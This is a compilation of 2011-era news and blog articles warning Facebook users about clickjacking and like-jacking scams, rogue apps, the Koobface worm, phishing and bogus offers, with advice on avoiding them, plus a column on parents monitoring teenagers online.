'Clickjacking' scams on Facebook: The Real Deal

East Syracuse (WSYR-TV) - It's called "clickjacking" and it appears thousands of people are falling victim to it on Facebook. If you haven't been a victim yet, chances are that at least a few of your friends have.

In one version of the scam, crooks are claiming they've got the picture of Osama bin Laden's body after he was killed in a raid by Navy SEALs. They may also say they can tell you who looks at your Facebook page the most or what your kids will look like before they're even born.

Whatever the promise, they're just hoping to fool a few people because from there the clickjacking scam can spread like wildfire.

One recent example targeted a NewsChannel 9 employee's Facebook account. He logged in and received a message saying, "You currently have 4 people stalking your profile... Click here to see who it is."

If you click on the button, you'll be sent to a new screen that asks you to complete a three-step registration process. What they don't tell you is that one of those steps is granting the scammer access to your entire list of friends, so they can blast them with the same message that lured you in.

Another example is the version that promises to show Facebook users how cute their future baby will be. They're bogus, of course, and are really designed to trick the user into downloading spyware to their computer.

If you fall victim to clickjacking, remove any and all links from your wall and news-feed right away. You will also want to be sure the anti-virus protection on your computer is up to date. Lastly, you may consider sending a message to your friend list about the mistake you made, so others don't follow your lead.

source: 9wsyr.com/content/news/real_deal/story/Clickjacking-scams-on-Facebook-The-Real-Deal/AOYGzWvVGEKbYiaBaqmEzA.cspx

Don't fall for 'First Exposure: iPhone 5' Facebook scam

Recently there was a new scam released on Facebook. Users of this social network are duped into spreading spam. The creators of this scam are using the interest of the new iPhone 5. The scam starts when someone from your group of friends comments on a link in a post that leads to a news article about iPhone 5 at a website "greatlakesnews.info". If you click on this link you are redirected to different website which will show a captcha window. When you click verify, a message on you Facebook wall will notify all your friend that you have commented on this and providing them with the misleading iPhone 5 link. After your friend clicks on this link they are taken to a survey which is basically marketing, and the creators of this scam are making money of it. This type of attack is known as "clickjacking".

Don't click on this post.

Use only the popular, well established news sources. Facebook suggests not click on strange links even if they are from friends would cut out many of the legitimate links people share on Facebook.

source:macrisk.net/mac-security-news/17-first-exposure-iphone-5-facebook-scam

Italian model exposed in Facebook clickjacking attack

The mere mention of anything with a sex connotation on Facebook almost always begets some major activity, with people wanting to know more. As a result, whatever the attack vector or channel might be is propagated, and the attacker is sure to get some response.

In this example a Facebook click-jacking attack jumped on the bandwagon of Italian model Marika Fruscio's unfortunate incident with a wardrobe malfunction on live TV. The title of the scam on Facebook was "The beautiful Marika Fruscio shows her breasts on Italian TV!", which almost sounds like it was staged as opposed to an accident. Whatever the theory, the interesting part of this attack is what happens when someone clicks on the provided link to watch the embedded video.

The example seems harmless as upon clicking the link, the user is directed to another page where they can view the video. While this is happening, the user's account is being exploited to post the video on their homepage to distribute. The user is also added to the list of those who like the video, consequently encouraging others to view this. The series of steps involved is shown below.

An infected account shows the advert as being liked either by a friend or contact within your Facebook account:

The user is then directed to the page below to view the video. Unknown to the user, there are hidden elements and iframes within the HTML code, located at the Play button, which directly access the user's 'like' option within Facebook . These hidden elements are where the magic of click-jacking, or shall we say like-jacking, happens.

Innocent-looking page as seen by the user:

Riddled page with hidden elements and iframe superimposed on the Play button and various parts of the page:

On clicking the Play button, two events take place. The first is that the user's Facebook account accepts 'liking' the video, with the video being posted on their wall as a result. The second is that the video plays Marika Fruscio's wardrobe malfunction on live TV.

Below is the screen the user is presented with if they are not already logged in to Facebook:

The compromised account then displays a video link on the user's wall encouraging others to view this.

There are several reasons for this type of attack and in this instance although there is nothing apparently malicious, it brings to mind the elaborate ploy where an attacker uses this means to earn some money. Pay-per-click springs to mind, as attackers for these scams usually get the user to click on hidden links in order to get many hits, which then rewards the attacker with money.

Further analysis using our in-house tools on spontour.net shows the various links and how they are interconnected.

source:community.websense.com/blogs/securitylabs/archive/2011/03/28/Italian-Model-Wardrobe-Malfunction-on-Live-TV.aspx

Rogue Apps

Facebook applications are nothing new. There are oodles of them floating all over. Did you all know that the Facebook apps have access to obtain personal information from your Facebook profile? Rogue applications potentially post bogus links to your wall or sometimes repost something personal about you.

If the user clicks the ‘Allow’ button when the app requests initial permission to access information about you, the app starts its works and the user’s personal information can be accessed easily.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about

The Koobface Worm

Koobface is a computer worm that targets users of Facebook and other social networking websites. Koobface spreads across Facebook via posts that include a link claiming to be an Adobe Flash Player update. When the link is clicked, it starts downloading malware that will infect your computer, hijack your Facebook profile and spam your friends with its malicious download link. Mainly Window users are affected by the Koobface worm

Throughout the day while surfing the net we come across innumerable article but you never know once in a while you hit ones that actually make you feel good about having spent time reading it. Frankly, I was also not much aware of such scams but now as I know of such bad stuff happening, I would be really cautious. Surely you all too would be!

My suggestion would be share the information regarding the most common Facebook attacks, spams and hacks with all your friends; you never know it might save them from being the victim of the Facebooks scam, hack or attack.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about

Fake Page Spam

Don’t get tempted to check different profile pages on Facebook, as you never know which one is genuine. There are lot many fake page profiles setup on Facebook. For the ones that are usually headlined with some type of feature that’s not offered by Facebook such as a ‘Dislike button’ feature are fake pages. These fake pages are created by hackers who can easily steal personal information from users after they either LIKE the page and in some case choose to attend a newly created event on the fake page.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about

Fake Friend Request

Facebook undeniably helps you meet lot many new people but that can lead you into the problem. Sad but true, some people are too much addicted to Facebook. They don’t seem to see the world outside of their laptop/PC screens. Such people are easy target for hackers and spammers.

If you’re the one who accepts friends requests sent by unknown users, you got to be really cautious as accepting such requests can help hackers extract data from your Facebook profile. It is genuinely suggested that you all accept friend requests from people that you actually know and not the strangers.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about

Money Transfer Scam

This is the easiest way of targeting the users. Anybody who gets the message from some friend to transfer some money for he/she is in dire need would at once want to help. You all need to be cautious enough and make sure you don’t respond to such messages by transferring the money. This is money transfer scam that gets you to wire money to scammers via Western Union or any other transfer service available.

source:http://webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about/

Phony Email/Message

Spammers/scammers sometimes send phony emails that appear genuine but are not. No matter how convincing these notifications are don’t click until you are sure if it’s true. If an email looks strange, don’t click on any of the links in it, and delete it from your inbox immediately. Be especially wary of emails that ask you to update your account, tell you to open an attachment or something similar.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about

Phishing Schemes

Phishing schemes can get hackers know about your credentials-username, password and other information. This can lead to hackers getting access to your profile and there is quite a possibility that they may attempt to gain access to your other online accounts. Phishing schemes can be difficult to spot because scammers might befool you easily by setting up a page that resembles Facebook login portal.

,source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about/

Fake Polls/Questionnaires

Polls or questionnaires are very common thing we all come across while surfing the internet. Facebook too is not left untouched. Facebook recently implemented a polling system that allows users to post a poll full of questions that they choose and thereafter share the same with their friends. If you all are not well aware, let me tell you that there are lot many fake polls and questionnaires circulating all over Facebook.

These fake polls can redirect users to pages outside of Facebook were they can act as a Phishing site which are intentionally designed to steal personal information. Also, there fake polls can easily lead to malware laden sites offering quizzes and online games which could directly harm your systems.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about/

Clickjacking

Clickjacking is the process in which Facebook users see an enticing, eye-catching, too-good to be true link posted on someone’s profile asking that you copy and paste it to your web browser or click on it to view. Once the user follows the process, their Facebook wall is populated with the same link which spreads it to all of their Friends luring them to click on the same link thereafter giving the hackers the easy way to gain access to a user’s Facebook account.

Remember the video links that after bin Laden’s death spread like wildfire by purporting to offer users a glimpse at video or photos of bin Laden’s death? Well, that was clickjacking.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about/

Top Facebook Hacks, Scams And Attacks You Need to Know About

Founded in February 2004, Facebook is a social utility that helps people communicate efficiently with their friends, family and other people in the network. Facebook brings you a safe experience on the Internet to stay connected with your family and friends. Giving people the hold over what you want to share and make the world more open and connected, Facebook for people of all generations is actually a blessing.

Millions of people today use Facebook to keep up with friends, upload an unlimited number of photos, share links and videos, and learn more about the people they meet. Needless to say, every good thing comes with its share of cons. You all will undeniably agree with me on the fact that each one of us fears the hacks and spams. Correct me if I am wrong!

Social media is one of the main avenues that hackers today target. We don’t use any other means of communication like the social media platforms and this paves the way for hackers to use different methods to entice potential victims. I would indeed not talk in length about the reasons why hackers today target the social media platforms. The article here is genuinely dedicated to various Facebook hacks and spams that I think we all should be well aware of so that we are not the next targets.

We all heaved a sigh of relief when Facebook launched a new security wall to block scammers, but potential spammers are confident to find new ways of targeting Facebook users. Listed below are the most common Facebook scams that I would suggest you all to take a look at to login at.

From a simple link to a rogue Facebook application that can steal personal data of the users, there are some spams and attacks that each one of us should know about. List of the most common Facebook attacks, spams and hacks are:

Clickjacking

Fake Polls/Questionnaires

Phishing Scheme

Phony Email/Message

Money Transfer Scam

Fake Page Spam

The Koobface Worm

Rogue Apps

source:http://webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about/

What is Clickjacking

Clickjacking is a malicious technique of tricking web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

Clickjacking involves generating a fake graphical overlay on top of an existing Web page in order to visually change the Web page while preserving its functionality (buttons, forms, etc.). This is done with the intension of misleading users to interact with the hidden Web page while they believe they are interacting with a completely different Web site.

Using only CSS Z-INDEX and HTML IFRAME, an attacker can create a transparent victim web page that contains privileged buttons. Underneath this transparent IFRAME, the attacker puts content, like a game, that entices the user to click. You may think you're playing a game, when you're actually starting a webcam recording.

For example this scam called OMG teacher nearly kills boy once you click on the link it will tell you like Woah in order to see the video you must complete a survey and if you do that you just given a hacker/thief your credit card details and other private info

source:http://www.mywot.com/en/forum/12372-clickjacking-attacks-spotted-on-facebook

Dear parents of the Facebook Generation, it's time to step it up.

When a 13-year old Tacoma, Washington boy named Vito LaPinta, Jr. learned about the death of Osama Bin Laden he decided to help warn the president on Facebook about what might happen next regarding suicide bombers. A week later, Vito was called into the principal’s office of his middle school and greeted by a suited up Secret Service agent wearing dark glasses.

Vito, admittedly terrified by the agent, was then told by the agent that his post was considered a ‘threat towards the President.’ When asked about how she felt about what had went down, Vito’s mother Timi Robertson stated “My 13-year-old son is supposed to be safe and secure in his classroom and he’s being interrogated without my knowledge or consent privately.” As a parent I too would’ve been livid. I agree with Timi’s reaction but I also wonder if she’s doing everything she can to monitor what her son is doing and saying online.

The challenges for us parents

Being a parent in this day and age can be really tough. Back in the day, it was harder to keep track of our tweens and teens because we couldn’t get ahold of them as easily. Now, while it’s much easier to stay in touch via mobile phone, SMS, Facebook etc., there’s a whole new set of challenges that really put our parenting skills to the test.

Nowadays, parents have a new job and it’s in the field of online PR training. Tweens and teens biologically are not good at self-perception awareness and in tune with how the world sees them as individuals. They don’t fully realize (and can’t because of their age) that if they joke about murder, suicide, sex, drugs, alcohol, race, religion, etc. on a site like Facebook where they might be connected to parents, grandparents, parents of their friends, etc….it’ll result in an inadvertent rippling storm of offensiveness to many people that they care a lot about. Something small and meant to be harmless could get them, and their parents into big trouble, not just legally, but in family and academic social circles.

An aversion to technology, the web, or Facebook is no excuse

With so much information, content and opinions being so easily shareable, therein lies the importance of your child’s understanding of their potential audience AND their understanding of how what they say and do online is easily seen by so many. If you have a teenager online, watch how they interact with their friends, family members etc. You’ll be able to see quickly how great of a job you are doing (or not) monitoring and preparing them for such a transparent and communicative world.

Believe or not, I still know quite a few people that don’t even have an email address let alone a Facebook account. Many of them, out of fear of the unknown and stubbornness mostly, refuse to get on board. I’m fine with that if you don’t have kids that are online. If you do have children that are on social networks like Facebook, YouTube and Twitter, if you don’t at least have an account on any of the sites that your child is on for monitoring purposes and also know what their personal login is, you are another failing parent in the digital age.

Another scary thing is that 7.5 million of the 20 million minors on Facebook are below the minimum age.

Yikes.

While I know that kids will always lie and experiment and push the envelope with us parents, it’s important that we minimize the risk by communicating with them often and making sure to keep a close eye on those under 13 years old. It’s our duty to monitor the appropriation of sites visited, content downloaded, and activity shared online.

Many teens also have an iPod Touch and a Foursquare or GoWalla account (I’ve deemed geo-location apps off limits to my teenagers). This also means they are able to plot their locations when Wi-Fi is available, sharing it with the world, not fully understanding what it really means to create database records of their movement, their most frequented hang out spots, and how it could be used against them.

As parents of children in one of the most fast-paced eras of information where API’s make it possible for anyone to track our children’s activities unless they’re off the grid completely or have had help from their parents to lock down their privacy settings, our presence and involvement in their day-to-day is more important than ever. Even when you think you’ve done a great job with this, it never hurts to have regular discussions with them and remind them about the impact of their content and activity online. It’s important for both their safety, and more importantly, their offline reputation.

source: http://www.zdnet.com/blog/feeds/dear-parents-of-the-facebook-generation-its-time-to-step-it-up/3904

[ALERT] Have you heard of HCG diet? AMAZING AND IT WORKS, I lost 2lbs in the last 3 days

Scam Signature Message: Have you heard of HCG diet? AMAZING AND IT WORKS, I lost 2lbs in the last 3 days

If you see this on a friend's Newsfeed, or if it is posted directly to your wall, then there is a good possibility that your friend has been hacked or has a rogue Facebook application installed. We have seen this posting several times. There is most always a disclaimer from the Facebook account doing the posting claiming that they didn't post it, and they don't know how it happened.

Trending: May 2011

Why it's a Scam:

Once you click on the Wall link, you are taken to www.hcg-ultrass.info/ shown below:

This page is engineered to look like a news site, and serves as an infomercial for HCG Ultra drops. It appears the scammers are taking control of user accounts, and then spamming this message to their friends. The goal here is to use the trust you have in your friend's endorsement and purchase the diet drops. We can't speak to the legitimacy of the product, but considering the marketing methods employed we recommend you steer clear of this product. You could likely find similar products far cheaper at a grocery or health food store.

How to Deal with the Scam:

If you see this posted on your friend's Wall, then try to contact them immediately and let them know that their Facebook account could be compromised. You can refer them to the following posts on what they should do next:

Four things you need to do if your Facebook account gets hacked

How to protect your Facebook account from Rogue Applications

If you or your Facebook friends are falling for tricks like this, it's time to get yourself informed of the latest threats. Be sure to join the Facecrooks page on Facebook to stay informed of the latest security issues. source:http://facecrooks.com/safety-center/scam-watch/item/1311-alert-have-you-heard-of-hcg-diet?-amazing-and-it-works-i-lost-2lbs-in-the-last-3-days

[SCAM ALERT] Get Your 2 Free Southwest Tickets Now - Ends Sundayunday

Scam Signature Message: Get Your 2 Free Southwest Tickets Now! Ends Sunday

Scam Type: Comment Exploit, Bogus Offer

Trending: May 2011

Why it's a Scam:

Clicking the wall post link takes you to the following page:

Clicking the "Comment" button posts this the very same status update to your Wall and loads the following bogus offer:

If you read the fine, you must complete several "reward offers." Not only is this a ridiculous hoop to jump through, and will cost you a lot of money in the end, but the scammers are acquiring a treasure trove of your personal data. You will be required to provide your name, address, phone numbers and date of birth. This will enable the shady marketers to not only spam your Facebook account, but also harass you via snail mail, phone calls and text messages.

How to Deal with the Scam:

If you did make the mistake of commenting on the main page, you are now spamming your friends with the scammer's message. You should clean-up your newsfeed and profile to remove references to the scam. (click the "x" in the top right hand corner of the post).

The level of damage control required will largely depend on how many "special offers" you participated in. If you submitted your name, address, email, etc., then be on the lookout for more bogus offers arriving in your email and regular mail. Also be on alert for identity theft attempts.

If you or your Facebook friends are falling for tricks like this, it's time to get yourself informed of the latest threats. Be sure to join the Facecrooks page on Facebook to be kept informed of the latest security issues. source:http://facecrooks.com/safety-center/scam-watch/item/1314-scam-alert-get-your-2-free-southwest-tickets-now-ends-sunday

[Like-Jacking Alert] Amazing effect - WebCamera

Scam Signature Message: Amazing effect - WebCamera Big Baby Born !

This wall posting has been blurred because it contains a picture of a woman's vagina. The actual video shows a full grown man's head popping out like a baby.

Scam Type: Like-Jacking

Trending: May 2011

Why it's a Scam:

Clicking the wall post link takes you to amazing-baby-born.blogspot[dot]com. A lot of scams are hosted on blogspot, so always be wary of any links to this domian.

Clicking the play button "like-jacks" your Facebook account and posts the spammer's message to your Facebook Wall. At this time, it appears the sole purpose of the page is to generate advertising revenue from the display ads shown. We didn't encounter any malware or survey scams, but that could change in the future.

How to Deal with the Scam:

If you did make the mistake of clicking the play button for the video, your NewsFeed now has a posting stating that you "like" the video shown above. Clean this up by clicking the "x" in the top right hand corner of the post.

If you or your Facebook friends are falling for tricks like this, it's time to get yourself informed of the latest threats. Be sure to join the Facecrooks page on Facebook to be kept informed of the latest security issues. source: http://facecrooks.com/safety-center/scam-watch/item/1315-like-jacking-alert-amazing-effect-webcamera